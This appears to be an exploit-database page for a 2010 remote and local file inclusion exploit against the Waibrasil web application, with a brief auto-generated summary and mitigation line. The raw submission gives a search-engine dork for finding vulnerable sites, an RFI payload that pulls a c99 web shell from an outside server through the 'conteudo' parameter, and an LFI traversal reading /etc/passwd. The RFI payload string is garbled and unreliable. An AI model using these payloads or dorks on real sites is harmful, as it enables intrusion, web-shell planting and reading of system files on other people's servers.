header-logo
Suggest Exploit
vendor:
webapps
by:
eXeSoul
7,5
CVSS
HIGH
RFI / LFI
94
CWE
Product Name: webapps
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apcahe/Unix
2010

Waibrasil Remote / Local File Inclusion

Waibrasil Remote / Local File Inclusion vulnerability allows an attacker to include a file from a remote or local server via a vulnerable web application. The attacker can exploit this issue by manipulating the 'conteudo' parameter value in a malicious manner to execute arbitrary code. The vulnerable code can be found in the 'index.php' script. The attacker can use the 'hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?' exploit to include a remote file from a malicious server. The live demo of this exploit can be seen in the 'http://[site]/index.php?conteudo=../../../../etc/passwd' URL.

Mitigation:

The best way to mitigate this vulnerability is to restrict the access to the vulnerable parameter and validate the user input.
Source

Exploit-DB raw data:

# Title: Waibrasil Remote / Local File Inclusion
# Date:  10-05-2010
# Author: eXeSoul
# Vendor: www.waibrasil.com.br
# category: RFI / LFI
# Version: webapps
# Tested on: Apcahe/Unix
# VCE: ()
# Code : hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt? 
# Dork :  inurl:"index.php?conteudo="
-----------------------------------------------------------------------------------
##########################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#
#Thanks:I-H Guru ,SaiSatish,FB1H2S,Micr0,Dark_Blue,c00lt04d,X__HMG,Th3 RDXâ„¢,X_Cobra_X,AK-47
#
#Shoutz: Notieboi,r45c4l,Yash,M.R SK,Hacker Cyclone,Neo Hacker,S1layer
#
#Catch us at www.andhrahackers.com or www.teamicw.in
##########################################################################################################

Local File Inclusion

Dork:- inurl:"index.php?conteudo="


Exploited Link:- http://[site].com/index.php?conteudo=[exploit]


exploit:-  hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?

live demo :- http://[site]/index.php?conteudo=hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?



Dork:  inurl:"index.php?conteudo="

Exploit: www.Site.com/index.php?conteudo=[LFI]

Live Demo: http://[site]/index.php?conteudo=../../../../etc/passwd


# eXeSoul  mailto: exe.soul@live.com

# JAY HIND.!! JAY SHREE RAM.!! JAY SHREE KRISHA.!! JAY MAHADEV.!!

# eXploit-db.com [10-5-2010]